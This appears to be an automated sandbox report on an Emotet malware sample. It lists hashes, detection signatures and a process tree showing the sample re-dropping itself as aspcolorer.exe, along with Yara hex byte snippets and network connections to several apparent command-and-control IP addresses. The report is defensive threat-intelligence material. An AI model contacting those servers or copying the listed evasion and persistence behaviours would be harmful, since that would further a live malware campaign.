Play interactive tour

Edit tour

Windows Analysis Report emo.exe

Overview

General Information

Sample Name:	emo.exe
Analysis ID:	465749
MD5:	1d314c60cf2ab83672f258033f1c9fdb
SHA1:	a076655c3e4b48b2a074a7d37210adaea0e22f92
SHA256:	459f8d96d0c21300199c87ee798b594216732a27da6c3190f36b483df9faaabf
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Emotet

Drops executables to the windows directory (C:\Windows) and starts them

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

emo.exe (PID: 6700 cmdline: 'C:\Users\user\Desktop\emo.exe' MD5: 1D314C60CF2AB83672F258033F1C9FDB)

emo.exe (PID: 6728 cmdline: C:\Users\user\Desktop\emo.exe MD5: 1D314C60CF2AB83672F258033F1C9FDB)

aspcolorer.exe (PID: 7008 cmdline: C:\Windows\SysWOW64\aspcolorer.exe MD5: 1D314C60CF2AB83672F258033F1C9FDB)

aspcolorer.exe (PID: 7032 cmdline: C:\Windows\SysWOW64\aspcolorer.exe MD5: 1D314C60CF2AB83672F258033F1C9FDB)

svchost.exe (PID: 7092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6452 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5b80:$snippet4: 33 C0 C7 05 10 72 1E 04 20 2A 1E 04 C7 05 14 72 1E 04 20 2A 1E 04 A3 18 72 1E 04 A3 1C 72 1E 04 ...
00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5b80:$snippet4: 33 C0 C7 05 10 72 70 02 20 2A 70 02 C7 05 14 72 70 02 20 2A 70 02 A3 18 72 70 02 A3 1C 72 70 02 ...
00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5b80:$snippet4: 33 C0 C7 05 10 72 D7 02 20 2A D7 02 C7 05 14 72 D7 02 20 2A D7 02 A3 18 72 D7 02 A3 1C 72 D7 02 ...
00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp	Emotet	Emotet Payload	kevoreilly	0x5b80:$snippet4: 33 C0 C7 05 10 72 53 02 20 2A 53 02 C7 05 14 72 53 02 20 2A 53 02 A3 18 72 53 02 A3 1C 72 53 02 ...
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.emo.exe.41d0000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.emo.exe.41d0000.3.unpack	Emotet	Emotet Payload	kevoreilly	0x5f80:$snippet4: 33 C0 C7 05 10 72 1E 04 20 2A 1E 04 C7 05 14 72 1E 04 20 2A 1E 04 A3 18 72 1E 04 A3 1C 72 1E 04 ...
1.2.emo.exe.26f0000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.emo.exe.26f0000.3.unpack	Emotet	Emotet Payload	kevoreilly	0x5f80:$snippet4: 33 C0 C7 05 10 72 70 02 20 2A 70 02 C7 05 14 72 70 02 20 2A 70 02 A3 18 72 70 02 A3 1C 72 70 02 ...
5.2.aspcolorer.exe.2d60000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
5.2.aspcolorer.exe.2d60000.3.unpack	Emotet	Emotet Payload	kevoreilly	0x5f80:$snippet4: 33 C0 C7 05 10 72 D7 02 20 2A D7 02 C7 05 14 72 D7 02 20 2A D7 02 A3 18 72 D7 02 A3 1C 72 D7 02 ...
6.2.aspcolorer.exe.2520000.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.aspcolorer.exe.2520000.3.unpack	Emotet	Emotet Payload	kevoreilly	0x5f80:$snippet4: 33 C0 C7 05 10 72 53 02 20 2A 53 02 C7 05 14 72 53 02 20 2A 53 02 A3 18 72 53 02 A3 1C 72 53 02 ...
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: emo.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: http://105.224.170.204/

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: emo.exe	Virustotal: Detection: 91%	Perma Link
Source: emo.exe	Metadefender: Detection: 70%	Perma Link
Source: emo.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: emo.exe

Joe Sandbox ML: detected

Source: 5.0.aspcolorer.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.awz
Source: 6.1.aspcolorer.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.1.aspcolorer.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 1.1.emo.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3
Source: 1.0.emo.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.awz
Source: 6.0.aspcolorer.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.awz
Source: 0.0.emo.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.awz
Source: 0.1.emo.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen3

Source: emo.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source:

Binary string: sNQ.pdb source: emo.exe

Source: global traffic

TCP traffic: 192.168.2.4:49739 -> 186.159.186.156:8080

Source: Joe Sandbox View

IP Address: 186.159.186.156 186.159.186.156

Source: global traffic	TCP traffic: 192.168.2.4:49742 -> 200.54.111.170:80
Source: global traffic	TCP traffic: 192.168.2.4:49759 -> 104.136.151.73:80
Source: global traffic	TCP traffic: 192.168.2.4:49760 -> 66.112.88.78:80
Source: global traffic	TCP traffic: 192.168.2.4:49763 -> 105.224.170.204:80

Source: unknown	TCP traffic detected without corresponding DNS query: 186.159.186.156
Source: unknown	TCP traffic detected without corresponding DNS query: 186.159.186.156
Source: unknown	TCP traffic detected without corresponding DNS query: 186.159.186.156
Source: unknown	TCP traffic detected without corresponding DNS query: 200.54.111.170
Source: unknown	TCP traffic detected without corresponding DNS query: 200.54.111.170
Source: unknown	TCP traffic detected without corresponding DNS query: 200.54.111.170
Source: unknown	TCP traffic detected without corresponding DNS query: 104.136.151.73
Source: unknown	TCP traffic detected without corresponding DNS query: 104.136.151.73
Source: unknown	TCP traffic detected without corresponding DNS query: 104.136.151.73
Source: unknown	TCP traffic detected without corresponding DNS query: 66.112.88.78
Source: unknown	TCP traffic detected without corresponding DNS query: 66.112.88.78
Source: unknown	TCP traffic detected without corresponding DNS query: 66.112.88.78
Source: unknown	TCP traffic detected without corresponding DNS query: 105.224.170.204
Source: unknown	TCP traffic detected without corresponding DNS query: 105.224.170.204
Source: unknown	TCP traffic detected without corresponding DNS query: 105.224.170.204

Source: svchost.exe, 0000000C.00000002.769943287.000001C187513000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000C.00000002.769943287.000001C187513000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000C.00000003.758300421.000001C187586000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-08-05T07:15:36.6439098Z\|\|.\|\|4158786a-b0d5-44dc-84ce-29db88174d99\|\|1152921505693736035\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000C.00000003.758300421.000001C187586000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-08-05T07:15:36.6439098Z\|\|.\|\|4158786a-b0d5-44dc-84ce-29db88174d99\|\|1152921505693736035\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000000C.00000003.750900152.000001C18756D000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac

Source: aspcolorer.exe, 00000006.00000002.916613045.000000000019C000.00000004.00000001.sdmp	String found in binary or memory: http://105.224.170.204/
Source: svchost.exe, 0000000C.00000003.750378045.000001C18753A000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 0000000C.00000003.750378045.000001C18753A000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: svchost.exe, 0000000C.00000002.769885562.000001C187390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 0000000C.00000002.769885562.000001C187390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000000C.00000003.750378045.000001C18753A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
